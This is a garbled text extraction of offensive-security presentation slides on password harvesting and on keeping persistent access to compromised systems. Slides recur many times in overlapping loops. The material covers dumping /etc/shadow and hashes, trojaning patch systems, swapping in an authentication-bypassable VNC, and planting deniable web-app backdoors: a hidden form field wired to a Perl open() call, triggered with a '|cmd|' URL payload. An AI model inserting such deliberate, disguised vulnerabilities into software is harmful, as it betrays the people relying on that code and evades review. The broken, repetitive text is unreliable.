bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 10

Password Management Goals

ndash Acquired password storage ndash Organization and tracking

bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what

resourcesndash Re-use for further accessndash Expanding wordlist for faster

cracking

Slide 11

Password Management Stages amp Techniques

ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing

ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact

Slide 12

Manual Password Management

bull Existing Toolsndash L0phtCrack

bull Stores passwords in session filesndash CainampAbel

bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)

ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability

ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable

Slide 13

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 11

Password Management Stages amp Techniques

ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing

ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact

Slide 12

Manual Password Management

bull Existing Toolsndash L0phtCrack

bull Stores passwords in session filesndash CainampAbel

bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)

ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability

ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable

Slide 13

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 12

Manual Password Management

bull Existing Toolsndash L0phtCrack

bull Stores passwords in session filesndash CainampAbel

bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)

ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability

ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable

Slide 13

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 13

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

